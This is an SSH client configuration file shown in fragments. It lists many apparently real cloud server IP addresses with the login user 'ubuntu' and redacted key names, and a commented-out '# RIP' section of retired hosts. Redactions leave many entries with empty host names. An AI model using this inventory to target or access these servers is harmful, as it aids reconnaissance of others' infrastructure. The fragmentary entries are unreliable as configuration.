  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                18.130.229.26
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
```

```
  HostName              3.8.151.175
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              18.130.200.182
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              3.8.138.77
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes


host [REDACTED]
  HostName              3.17.81.101
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              18.223.106.206
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              18.222.108.49
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              18.222.107.154
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              3.17.191.71
  User                  ubuntu
  IdentityFile          ~/.ssh/[REDACTED]
  IdentitiesOnly        yes

host [REDACTED]
  HostName              3.17.182.179
```

```
  User              ubuntu
  IdentityFile      ~/.ssh/[         ]
  IdentitiesOnly    yes

host [        ]-1
  HostName          18.221.118.169
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [        ]-2
  HostName          3.17.165.58
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [        ]-3
  HostName          18.191.195.206
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [        ]-4
  HostName          18.222.182.201
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [        ]-5
  HostName          18.191.200.46
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [        ]-6
  HostName          3.16.82.45
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    [  ]

host [          ]
  HostName          54.148.234.88
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
  IdentitiesOnly    yes

host [          ]
  HostName          34.220.189.209
  User              ubuntu
  IdentityFile      ~/.ssh/[          ]
```

```
    IdentitiesOnly          yes
host ▨▨▨▨▨▨▨▨▨▨
    HostName                34.215.151.134
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨▨▨▨▨
    HostName                34.217.212.132
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨▨▨▨▨
    HostName                52.38.153.12
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨▨▨▨▨
    HostName                54.245.190.196
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨
    HostName                18.188.183.47
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨
    HostName                18.191.45.140
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨
    HostName                52.14.104.111
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨
    IdentitiesOnly          yes

host ▨▨▨▨▨▨
    HostName                18.219.78.174
    User                    ubuntu
    IdentityFile            ~/.ssh/▨▨▨▨▨▨▨
    IdentitiesOnly          yes
```

```
host
    HostName            18.223.101.64
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            3.17.148.236
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            34.221.120.255
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            54.149.251.200
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            34.214.232.30
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            34.218.252.229
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            54.202.152.1
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            34.218.227.192
    User                ubuntu
    IdentityFile        ~/.ssh/
    IdentitiesOnly      yes

host
    HostName            3.8.142.149
```

```
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  35.176.195.226
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  35.178.211.29
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  3.8.2.71
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  35.177.204.51
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  3.8.56.230
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  34.222.219.113
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  18.237.142.38
  User                      ubuntu
  IdentityFile              ~/.ssh/
  IdentitiesOnly            yes

host
  HostName                  35.164.252.167
  User                      ubuntu
  IdentityFile              ~/.ssh/
```

```
  IdentitiesOnly        yes

host
  HostName               34.218.51.38
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               54.187.90.250
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               54.186.228.126
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes


host
  HostName               35.172.165.52
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               3.83.187.51
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               3.85.218.51
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               18.232.73.100
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes

host
  HostName               34.237.75.25
  User                   ubuntu
  IdentityFile           ~/.ssh/
  IdentitiesOnly         yes
```

```
host     ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  HostName            18.232.59.109
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  ▓▓▓▓▓▓▓▓▓▓▓▓        ▓▓▓

host     ▓▓▓▓▓▓▓▓▓
  HostName            18.204.44.242
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓▓▓
  HostName            3.80.11.43
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓▓▓
  HostName            3.95.131.249
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓▓▓
  HostName            34.204.187.67
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓▓
  HostName            34.236.36.198
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓▓
  HostName            3.94.95.225
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓
  HostName            3.85.218.72
  User                ubuntu
  IdentityFile        ~/.ssh/▓▓▓▓▓▓▓▓▓
  IdentitiesOnly      yes

host     ▓▓▓▓▓▓
```

```
  HostName              34.204.196.80
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              34.238.193.108
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              18.210.22.18
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              100.24.118.81
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              3.80.231.171
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              34.215.235.156
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              54.190.23.253
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              34.220.236.200
  User                  ubuntu
  IdentityFile          ~/.ssh/
  IdentitiesOnly        yes

host
  HostName              34.208.32.10
  User                  ubuntu
```

```
   IdentityFile              ~/.ssh/
   IdentitiesOnly            yes

host
   HostName                  54.200.29.61
   User                      ubuntu
   IdentityFile              ~/.ssh/
   IdentitiesOnly            yes

host
   HostName                  54.188.110.10
   User                      ubuntu
   IdentityFile              ~/.ssh/
   IdentitiesOnly            yes

host
   HostName                  34.216.157.148
   User                      ubuntu
   IdentityFile              ~/.ssh/
   IdentitiesOnly            yes

host
   HostName                  54.188.86.80
   User                      ubuntu
   IdentityFile              ~/.ssh/
   IdentitiesOnly            yes

# RIP

# host
#   HostName                 34.254.249.212
#   User                     ubuntu
#   IdentityFile             ~/.ssh/
#   IdentitiesOnly           yes

# host
#   HostName                 34.251.109.44
#   User                     ubuntu
#   IdentityFile             ~/.ssh/
#   IdentitiesOnly           yes

# host
#   HostName                 52.211.167.148
#   User                     ubuntu
#   IdentityFile             ~/.ssh/
#   IdentitiesOnly           yes

# host
#   HostName                 54.154.112.182
#   User                     ubuntu
```

```
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              34.243.40.14
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              34.245.47.134
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              52.50.197.153
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              34.249.70.87
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              34.254.90.78
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              52.49.84.134
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              34.245.212.5
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes

# host
#    HostName              18.202.244.38
#    User                  ubuntu
#    IdentityFile          ~/.ssh/                        id_rsa
#    IdentitiesOnly        yes
```

```
# host              ████████████████
#    HostName                   52.48.120.167
#    User                       ubuntu
#    IdentityFile               ~/.ssh/███████████████████
#    IdentitiesOnly             yes

# host              ████████████████
#    HostName                   34.248.151.120
#    User                       ubuntu
#    IdentityFile               ~/.ssh/███████████████████
#    IdentitiesOnly             yes

# host              ████████████████
#    HostName                   63.32.102.53
#    User                       ubuntu
#    IdentityFile               ~/.ssh/███████████████████
#    IdentitiesOnly             yes

# host              ████████████████
#    HostName                   34.243.12.185
#    User                       ubuntu
#    IdentityFile               ~/.ssh/███████████████████
#    IdentitiesOnly             yes

# host              ████████████████
#    HostName                   34.243.95.217
#    User                       ubuntu
#    IdentityFile               ~/.ssh/███████████████████
#    IdentitiesOnly             yes

# host              ██████████
#    HostName                   34.229.63.253
#    User                       ubuntu
#    IdentityFile               ~/.ssh/██████████
#    IdentitiesOnly             yes

# host              ██████████
#    HostName                   35.171.45.7
#    User                       ubuntu
#    IdentityFile               ~/.ssh/██████████
#    IdentitiesOnly             yes

# host              ██████████
#    HostName                   18.204.48.66
#    User                       ubuntu
#    IdentityFile               ~/.ssh/██████████
#    IdentitiesOnly             yes

# host              ██████████
```

```
#    HostName              34.239.164.126
#    User                  ubuntu
#    IdentityFile          ~/
#    IdentitiesOnly        yes


# host
#    HostName              35.178.205.38
#    User                  ubuntu
#    IdentityFile          ~/
#    IdentitiesOnly        yes

# host
#    HostName              34.209.213.213
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              54.213.228.89
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              35.178.193.34
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              18.130.184.169
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              35.178.33.161
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              35.178.203.230
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              3.8.238.68
```

```
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              3.8.200.5
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              34.248.175.157
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              52.211.211.22
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              34.244.242.52
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              34.245.179.109
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              34.247.162.34
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              52.50.170.153
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              3.209.82.75
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
```

```
#   IdentitiesOnly        yes

# host
#   HostName              34.239.179.201
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              3.81.25.76
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              18.207.132.193
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              35.168.59.3
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              100.26.140.22
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              3.8.192.137
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              3.8.135.140
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes

# host
#   HostName              35.178.168.24
#   User                  ubuntu
#   IdentityFile          ~/.ssh/
#   IdentitiesOnly        yes
```

```
# host
#    HostName              18.130.16.191
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              3.8.157.219
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              3.9.24.95
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              52.49.24.37
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              34.253.230.122
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              52.215.81.250
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              54.76.212.26
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              18.202.55.54
#    User                  ubuntu
#    IdentityFile          ~/.ssh/
#    IdentitiesOnly        yes

# host
#    HostName              34.254.187.46
```

```
#    User                    ubuntu
#    IdentityFile            ~/.ssh/
#    IdentitiesOnly          yes
```